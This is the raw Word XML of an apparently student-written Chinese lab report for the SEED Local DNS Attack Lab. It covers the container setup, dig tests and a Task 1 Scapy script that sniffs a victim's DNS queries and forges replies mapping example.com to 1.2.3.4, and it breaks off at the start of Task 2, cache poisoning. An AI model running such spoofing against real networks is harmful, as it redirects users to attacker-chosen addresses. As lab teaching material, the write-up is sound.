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72A53" w14:textId="00D71293" w:rsidR="00B61640" w:rsidRPr="00E86A8C" w:rsidRDefault="00E86A8C" w:rsidP="00E86A8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6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E86A8C">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>实验环境配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEF4FDA" w14:textId="12142459" w:rsidR="00E86A8C" w:rsidRDefault="00E86A8C" w:rsidP="00E86A8C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>进入实验目录:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C32B39" w14:textId="25A2189D" w:rsidR="00E86A8C" w:rsidRPr="0033392D" w:rsidRDefault="00E86A8C" w:rsidP="00546E97">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rStyle w:val="notion-enable-hover"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="EB5757"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0033392D">
        <w:rPr>
          <w:rStyle w:val="notion-enable-hover"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="EB5757"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/home/seed/Desktop/Labs_20.04/Network Security/Local DNS Attack Lab/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0033392D">
        <w:rPr>
          <w:rStyle w:val="notion-enable-hover"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="EB5757"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Labsetup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EB2AC4">
        <w:rPr>
          <w:rStyle w:val="notion-enable-hover"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="EB5757"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E0CA50" w14:textId="4E1B4E0B" w:rsidR="00E86A8C" w:rsidRDefault="00E86A8C" w:rsidP="00263ACE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t>启动容器</w:t>
      </w:r>
      <w:r w:rsidR="0033392D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0033392D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C5A2FC3" wp14:editId="167A8ED2">
            <wp:extent cx="5274310" cy="1188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2D3B" w14:textId="0666D5F9" w:rsidR="00E86A8C" w:rsidRDefault="00E86A8C" w:rsidP="00E86A8C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>本实验网络拓扑图如下所示:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBBA0F6" w14:textId="13E4C2E2" w:rsidR="00E86A8C" w:rsidRDefault="00E86A8C" w:rsidP="00E86A8C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72B1247D" wp14:editId="5B7CADCC">
            <wp:extent cx="5274310" cy="33267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1684" w14:textId="77777777" w:rsidR="00992160" w:rsidRDefault="00992160" w:rsidP="00E86A8C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E300035" w14:textId="748F3FF6" w:rsidR="00E86A8C" w:rsidRDefault="00E86A8C" w:rsidP="00E86A8C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E86A8C">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>2. Testing the DNS Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3695C2E5" w14:textId="02DFF1C8" w:rsidR="00E86A8C" w:rsidRDefault="00E86A8C" w:rsidP="00E86A8C">
      <w:r>
        <w:t>在User Container(10.9.0.5)上运行一些命令保证实验环境初始是没有问题的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644B4259" w14:textId="6DDDE6CE" w:rsidR="00E86A8C" w:rsidRPr="00E86A8C" w:rsidRDefault="00E86A8C" w:rsidP="00E86A8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>
        <w:t>Get the IP address of ns.attacker32.com</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E701AB" w14:textId="77777777" w:rsidR="00E86A8C" w:rsidRDefault="00E86A8C" w:rsidP="00E86A8C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</w:p>
    <w:p w14:paraId="74EC5043" w14:textId="3737AA4E" w:rsidR="00E86A8C" w:rsidRDefault="00E86A8C" w:rsidP="00E86A8C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E86A8C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6CCC85A2" wp14:editId="3ABC8C58">
            <wp:extent cx="5274310" cy="32689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A1D" w14:textId="4C07D768" w:rsidR="00E86A8C" w:rsidRDefault="00E86A8C" w:rsidP="00E86A8C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>可以看到结果为10.9.0.153，这一步是通过attacker ns server的，所以应该和attacker ns中/etc/bind/zone_attacker32.com中的结果是对应的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DF836D" w14:textId="385D8769" w:rsidR="00E86A8C" w:rsidRPr="00E86A8C" w:rsidRDefault="00E86A8C" w:rsidP="00E86A8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>
        <w:t xml:space="preserve">Get the IP address of </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="001961EB">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>www.example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD9D059" w14:textId="57C99A37" w:rsidR="00E86A8C" w:rsidRDefault="00E86A8C" w:rsidP="00E86A8C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E86A8C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E6AAC4E" wp14:editId="0379193B">
            <wp:extent cx="5274310" cy="33159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0925" w14:textId="7BE79202" w:rsidR="00E86A8C" w:rsidRDefault="00E86A8C" w:rsidP="00E86A8C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>这一步没有经过attacker ns server，所以结果应该是正确的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD94252" w14:textId="4CD13AA4" w:rsidR="00E86A8C" w:rsidRPr="00E86A8C" w:rsidRDefault="00E86A8C" w:rsidP="00E86A8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>
        <w:t xml:space="preserve">dig @ns.attacker32.com </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="001961EB">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>www.example.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="367A2803" w14:textId="2FA34F18" w:rsidR="00E86A8C" w:rsidRDefault="00E86A8C" w:rsidP="00E86A8C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E86A8C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4D54DCC8" wp14:editId="2A3E35D1">
            <wp:extent cx="5274310" cy="3054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2017" w14:textId="00B9F997" w:rsidR="00E86A8C" w:rsidRDefault="00E86A8C" w:rsidP="00E86A8C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>这一步经过了attacker ns server查询www.example.com，所以查询到的结果应该是attacker ns server的/etc/bind/zone_example.com中的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A8BC24" w14:textId="57AFC48D" w:rsidR="00E86A8C" w:rsidRPr="00E86A8C" w:rsidRDefault="00E86A8C" w:rsidP="00E86A8C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E86A8C">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>3. Task1: Directly Spoofing Response to User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4153343B" w14:textId="35A95AD8" w:rsidR="0033392D" w:rsidRPr="0033392D" w:rsidRDefault="00E86A8C" w:rsidP="0033392D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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33392D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>查看10.9.0.0/24网段interface名称：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1567B113" w14:textId="1312C7E0" w:rsidR="00E86A8C" w:rsidRDefault="0033392D" w:rsidP="0033392D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0033392D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17F3BA36" wp14:editId="1D9FB5EB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8523" w14:textId="4D80A4FE" w:rsidR="0033392D" w:rsidRDefault="0033392D" w:rsidP="0033392D">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>这里应该是: br-968e65729223</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B467BCA" w14:textId="1EA80ECB" w:rsidR="0033392D" w:rsidRPr="0033392D" w:rsidRDefault="0033392D" w:rsidP="0033392D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8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>在Attacker主机上创建attack-1.py文件，内容如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538966AC" w14:textId="77777777" w:rsidR="0033392D" w:rsidRPr="0033392D" w:rsidRDefault="0033392D" w:rsidP="0033392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33392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#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0033392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usr/bin/env python3</w:t>
      </w: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34AE06" w14:textId="77777777" w:rsidR="0033392D" w:rsidRPr="0033392D" w:rsidRDefault="0033392D" w:rsidP="0033392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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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scapy.all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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import *  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5504F857" w14:textId="77777777" w:rsidR="0033392D" w:rsidRPr="0033392D" w:rsidRDefault="0033392D" w:rsidP="0033392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import sys  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB80B7B" w14:textId="77777777" w:rsidR="0033392D" w:rsidRPr="0033392D" w:rsidRDefault="0033392D" w:rsidP="0033392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NS_NAME = </w:t>
      </w:r>
      <w:r w:rsidRPr="003339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"example.com"</w:t>
      </w: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9D3A69" w14:textId="77777777" w:rsidR="0033392D" w:rsidRPr="0033392D" w:rsidRDefault="0033392D" w:rsidP="0033392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def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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spoof_dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(pkt):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D6A7FC" w14:textId="77777777" w:rsidR="0033392D" w:rsidRPr="0033392D" w:rsidRDefault="0033392D" w:rsidP="0033392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339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(DNS in pkt and NS_NAME in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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pkt[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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DNS].qd.qname.decode(</w:t>
      </w:r>
      <w:r w:rsidRPr="003339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'utf-8'</w:t>
      </w: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)):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F74039" w14:textId="77777777" w:rsidR="0033392D" w:rsidRPr="0033392D" w:rsidRDefault="0033392D" w:rsidP="0033392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print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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pkt.sprintf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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339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"{DNS: %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003339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IP.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003339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 --&gt; %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003339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IP.dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003339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%: %DNS.id%}"</w:t>
      </w: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78677DBB" w14:textId="77777777" w:rsidR="0033392D" w:rsidRPr="0033392D" w:rsidRDefault="0033392D" w:rsidP="0033392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ip = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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IP(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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src=pkt[IP].dst, dst=pkt[IP].src) # Create an IP object  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354F6386" w14:textId="77777777" w:rsidR="0033392D" w:rsidRPr="0033392D" w:rsidRDefault="0033392D" w:rsidP="0033392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udp = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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UDP(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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sport=53, dport=pkt[UDP].sport) # Create a UPD object  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A9D76F" w14:textId="77777777" w:rsidR="0033392D" w:rsidRPr="0033392D" w:rsidRDefault="0033392D" w:rsidP="0033392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Anssec = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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DNSRR(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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rrname=pkt[DNS].qd.qname, type=</w:t>
      </w:r>
      <w:r w:rsidRPr="003339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ttl=259200, rdata=</w:t>
      </w:r>
      <w:r w:rsidRPr="003339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"1.2.3.4"</w:t>
      </w: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# Create an aswer record  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBA894E" w14:textId="77777777" w:rsidR="0033392D" w:rsidRPr="0033392D" w:rsidRDefault="0033392D" w:rsidP="0033392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dns = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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DNS(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1,rd=0,qr=1,qdcount=1,ancount=1,an=Anssec) # Create a DNS object  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E322FDB" w14:textId="77777777" w:rsidR="0033392D" w:rsidRPr="0033392D" w:rsidRDefault="0033392D" w:rsidP="0033392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spoofpkt = ip/udp/dns # Assemble the spoofed DNS packet  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5662B914" w14:textId="77777777" w:rsidR="0033392D" w:rsidRPr="0033392D" w:rsidRDefault="0033392D" w:rsidP="0033392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send(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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spoofpkt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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46309E9" w14:textId="77777777" w:rsidR="0033392D" w:rsidRPr="0033392D" w:rsidRDefault="0033392D" w:rsidP="0033392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myFilter = </w:t>
      </w:r>
      <w:r w:rsidRPr="003339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"udp and dst port 53 and src host 10.9.0.5"</w:t>
      </w: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 Set the filter  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067FFABA" w14:textId="77777777" w:rsidR="0033392D" w:rsidRPr="0033392D" w:rsidRDefault="0033392D" w:rsidP="0033392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pkt=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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sniff(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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iface=</w:t>
      </w:r>
      <w:r w:rsidRPr="003339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'br-968e65729223'</w:t>
      </w:r>
      <w:r w:rsidRPr="003339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filter=myFilter, prn=spoof_dns)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAF0AA4" w14:textId="5C0E6069" w:rsidR="006F32C3" w:rsidRDefault="0033392D" w:rsidP="006F32C3">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="357"/>
      </w:pPr>
      <w:r>
        <w:t>这里收到10.9.0.5的DNS请求的包后，</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://xn--example-hk3l463bg14axjddzak53ix10e.com" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>如果发现是查询example.com</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>，将回复1.2.3.4。然后执行attack-1.py开启监听</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9572FD" w14:textId="2454ED02" w:rsidR="006F32C3" w:rsidRDefault="006F32C3" w:rsidP="006F32C3">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server上(10.9.0.53)使用下图中的命令清除cache，否则其返回是比attacker要快的，我们就无法成功攻击了，不信可以试试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691535AC" w14:textId="77355287" w:rsidR="006F32C3" w:rsidRDefault="00667FFE" w:rsidP="006F32C3">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00667FFE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53AC0A31" wp14:editId="0E04C6B1">
            <wp:extent cx="5274310" cy="493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EFD0" w14:textId="6EE99AB9" w:rsidR="006F32C3" w:rsidRDefault="00667FFE" w:rsidP="006F32C3">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>在User容器上执行查询，结果如下:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E19A54" w14:textId="22B2DBB7" w:rsidR="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FFE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00667FFE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ED593B7" wp14:editId="7AFBA341">
            <wp:extent cx="5274310" cy="3093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D2EC" w14:textId="0B6FC5E0" w:rsidR="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FFE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>再次查询的时候因为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server已经查询过，有缓存了，所以攻击不会成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A06DB2B" w14:textId="66AA49DB" w:rsidR="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FFE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>这里因为网络访问的DNS请求甚至都比容器间的块，所以我们直接在Router容器中添加到外网的访问延时，这样在后续实验中就可以不受此问题困扰了。解决方法如下:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE04082" w14:textId="5C5AE47E" w:rsidR="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FFE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>在Router容器中使用以下命令添加延时:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F2B1E7" w14:textId="77777777" w:rsidR="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FFE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qdisc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> add dev eth0 root </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> delay 100ms </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FC9575" w14:textId="3487A5DC" w:rsidR="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FFE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t># 注意，这里的eth0是到外网的网卡</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A2A039" w14:textId="0F0EE8F6" w:rsidR="00667FFE" w:rsidRPr="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FFE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00667FFE">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Task2: DNS Cache Poisoning Attack – Spoofing Answers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C641A7" w14:textId="1DD65BE1" w:rsidR="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FFE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">攻击User主机效率太低了，每次都要响应User主机的请求，不如直接攻击DNS server，可以一劳永逸，缓存会在local </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server上保存很久。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438F7E56" w14:textId="61E3ED1E" w:rsidR="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FFE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">在local </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server上使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rnds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> flush命令清空DNS cache，然后使用以下命令查看DNS缓存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CAA72B" w14:textId="77777777" w:rsidR="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FFE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>rndc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dumpdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -cache  # 将缓存导出到特定文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD0A531" w14:textId="3703B227" w:rsidR="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FFE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:t>cat/var/cache/ bind/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dump.db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  # 查看文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D66380" w14:textId="21575442" w:rsidR="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FFE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00667FFE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E481F5A" wp14:editId="4D6A2397">
            <wp:extent cx="5274310" cy="610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FA48" w14:textId="006131B0" w:rsidR="00667FFE" w:rsidRDefault="00667FFE" w:rsidP="00667FFE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
